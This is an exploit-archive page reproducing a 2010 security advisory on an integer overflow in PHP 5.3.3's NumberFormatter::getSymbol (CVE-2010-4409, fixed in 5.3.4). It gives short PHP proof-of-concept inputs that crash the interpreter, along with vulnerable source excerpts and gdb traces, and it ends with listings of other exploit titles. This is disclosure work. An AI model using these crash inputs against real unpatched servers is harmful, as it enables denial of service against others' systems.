Menu

Search for hundreds of thousands of exploits

"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow"

Author

Exploit author

"Maksymilian Arciemowicz"

Platform

Exploit platform

multiple

Release date

Exploit published date

2010-12-10

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Fri, 10 Dec 2010 14:43:32 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 11.11.2010
- - Pub.: 10.12.2010

CERT: VU#479900
CVE: CVE-2010-4409
CWE: CWE-189
Status: Fixed in PHP 5.3.4

Affected Software:
- - PHP 5.3.3

Original URL:
http://securityreason.com/achievement_securityalert/91


- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a
wrapper for ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.

Number Formatter: allows to display number according to the localized
format or given pattern or set of rules, and to parse strings into numbers.


- --- 1. PoC for Integer Overflow ---
$nx=new NumberFormatter("pl",1);
$nx->getSymbol(2147483648);


- --- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow ---
As we can see in

- ---
PHP_FUNCTION( numfmt_get_symbol )
{
        long symbol;
        UChar value_buf[4];
        UChar *value = value_buf;
        int length = USIZE(value);
        FORMATTER_METHOD_INIT_VARS;

        /* Parse parameters. */
        if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(),
"Ol",
                &object, NumberFormatter_ce_ptr, &symbol ) == FAILURE )
        {
                intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
                        "numfmt_get_symbol: unable to parse input params", 0 TSRMLS_CC );

                RETURN_FALSE;
        }

        /* Fetch the object. */
        FORMATTER_METHOD_FETCH_OBJECT;

        length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf,
length, &INTL_DATA_ERROR_CODE(nfo)); <================= !!!TO BIG INT
HERE!!!
...
- ---

will crash for differ value. example {2444492804, 2147483648,
2147483649, 2554462209} (when rdi out off band (range 2to31 2to32 under
64bits linux)

Program received signal SIGSEGV, Segmentation fault.
0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*,
int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0  0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#1  0x00007fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120,
    return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710,
    return_value_used=17168144)
    at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269
...blabla

rip            0x7fffedf317f5   0x7fffedf317f5
<icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&)
const+21>
eflags         0x10206  [ PF IF RF ]

let`s see value ~4294901761

$nx=new NumberFormatter("pl",1);
$nx->getSymbol(4294901761);

will crash in memcpy(3) ;]

Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:90
90      ../sysdeps/x86_64/memcpy.S: No such file or directory.
        in ../sysdeps/x86_64/memcpy.S
(gdb) bt
#0  memcpy () at ../sysdeps/x86_64/memcpy.S:90
#1  0x00007fffea74a86a in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2  0x00007fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952,
    return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0,
    return_value_used=17826976)
    at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274
#3  0x00000000006e986a in zend_do_fcall_common_helper_SPEC (
    execute_data=0x7ffff7eb8068)
    at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
...

let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&)

- ---
int32_t
UnicodeString::extract(UChar *dest, int32_t destCapacity,
                       UErrorCode &errorCode) const {
  int32_t len = length();
  if(U_SUCCESS(errorCode)) {
    if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) {
      errorCode=U_ILLEGAL_ARGUMENT_ERROR;
    } else {
      const UChar *array = getArrayStart();
      if(len>0 && len<=destCapacity && array!=dest) {
        uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <======= MEMCPY
REFERENCE HERE
      }
      return u_terminateUChars(dest, destCapacity, len, &errorCode);
    }
  }

  return len;

}
- ---

so crash in rip=memcpy(3).

Method getLocal() also can generate simple crash (CWE-170)

$nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL,
IntlDateFormatter::FULL);
$nx->getLocale(1);


- --- 3. Fix ---
Fix in next PHP Version 5.3.4:
http://www.kb.cert.org/vuls/id/479900

SVN:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log


- --- 4. Greets ---
Special thanks for Pierre Joye and Stas Malyshev for very quickly fix
Michael Orlando for security support

and sp3x, Infospec


- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/
- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max () cxib net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJNAi5vAAoJEIO8+dzW5bUwsdsP/3/XRI/fXcqRg154DObVa/Ew
LgVS9ZP5yrTG2JBZnYYSHRB6ZXpK7hEfM838/gVLAolMEnLplynqmiTef74gHBAN
/VIGpE7sZDsxTeAk+MWzecxS0Gp77kR8ibcd8kClKmdcodgZ+JSJab/3snAclBXT
CesuN20tUPS4d7sjxTz7K9uZhO+7ezZn6xnJr67l2xcx8xCcrnNNRzapEzQ6tcBj
cM3pMxond3uAGQT3+ewwl1GQ/30HkX3fjPJPhT6Mna9/LH7f5IGHSnSxw5lJbUjY
xMaB+qTE44TrKTKqKkkowsPpAeaoQ7a3O16YG6qcWfly+9bf2vQVNhcG+hAa6mgK
ekNkleDKg+n7Qsgsrl/4mFS/40tCTss9/PQ8/QEp2g4VOSeyzuoVB2PJDl48X4pH
xabNVh9T3LWkxTnC5wcy2tuF7Tbb1eOngMxBclB9xR6vjr0nqT5EHLy4w+VnXo3I
FICv2EhojYXpxgrQEteK0JVnZC3ROspAJDM7YC4ZXk4HSRKnFK2Ymf+yyzhycyHu
cj1F70DTCNvXfdWUuvKVlTQUM4BDGpR1xs23EZqVky+8lk1mRJW98UwCs0kqpN46
maS8ZXM1+8dEMZFx/2wRcI2xkFoViMuKFpqwvVG+TPYY0fUSUfNdYCoxxl4YiWdD
u0SjiF38TxqaIjNnvaym
=3G4F
-----END PGP SIGNATURE-----
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2016-12-12 "iOS 10.1.x - Certificate File Memory Corruption" dos ios "Maksymilian Arciemowicz"
2015-12-09 "Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow" dos osx "Maksymilian Arciemowicz"
2014-04-08 "Apple Mac OSX 10.9 - Hard Link Memory Corruption" dos osx "Maksymilian Arciemowicz"
2013-02-05 "FreeBSD 9.1 - 'ftpd' Remote Denial of Service" dos freebsd "Maksymilian Arciemowicz"
2012-01-14 "PHP 5.3.8 - Multiple Vulnerabilities" dos multiple "Maksymilian Arciemowicz"
2011-11-04 "Libc - 'regcomp()' Stack Exhaustion Denial of Service" dos multiple "Maksymilian Arciemowicz"
2011-08-19 "PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities" dos php "Maksymilian Arciemowicz"
2011-07-01 "NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows" remote bsd "Maksymilian Arciemowicz"
2011-05-12 "Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service" dos linux "Maksymilian Arciemowicz"
2011-03-18 "PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference" dos linux "Maksymilian Arciemowicz"
2011-03-02 "vsftpd 2.3.2 - Denial of Service" dos linux "Maksymilian Arciemowicz"
2011-02-17 "PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference" dos linux "Maksymilian Arciemowicz"
2011-02-17 "PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service" dos php "Maksymilian Arciemowicz"
2011-01-07 "GNU libc/regcomp(3) - Multiple Vulnerabilities" dos linux "Maksymilian Arciemowicz"
2010-12-10 "PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow" dos multiple "Maksymilian Arciemowicz"
2010-12-07 "GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service" dos linux "Maksymilian Arciemowicz"
2010-11-05 "PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference" dos php "Maksymilian Arciemowicz"
2010-10-07 "libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)" dos multiple "Maksymilian Arciemowicz"
2010-09-08 "FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition" dos bsd "Maksymilian Arciemowicz"
2010-05-27 "FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)" dos freebsd "Maksymilian Arciemowicz"
2010-05-21 "Sun Solaris 10 - 'in.ftpd' Long Command Handling Security" dos solaris "Maksymilian Arciemowicz"
2010-05-21 "Sun Solaris 10 - Nested Directory Tree Local Denial of Service" dos solaris "Maksymilian Arciemowicz"
2010-04-24 "Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)" dos osx "Maksymilian Arciemowicz"
2010-01-08 "Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption" dos osx "Maksymilian Arciemowicz"
2010-01-08 "MATLAB R2009b - 'dtoa' Implementation Memory Corruption" dos linux "Maksymilian Arciemowicz"
2009-12-19 "PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass" local php "Maksymilian Arciemowicz"
2009-12-03 "PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure" local php "Maksymilian Arciemowicz"
2009-11-20 "Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution" remote multiple "Maksymilian Arciemowicz"
2009-11-20 "KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution" remote linux "Maksymilian Arciemowicz"
2009-11-13 "PHP 5.2.11/5.3.0 - Multiple Vulnerabilities" remote php "Maksymilian Arciemowicz" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected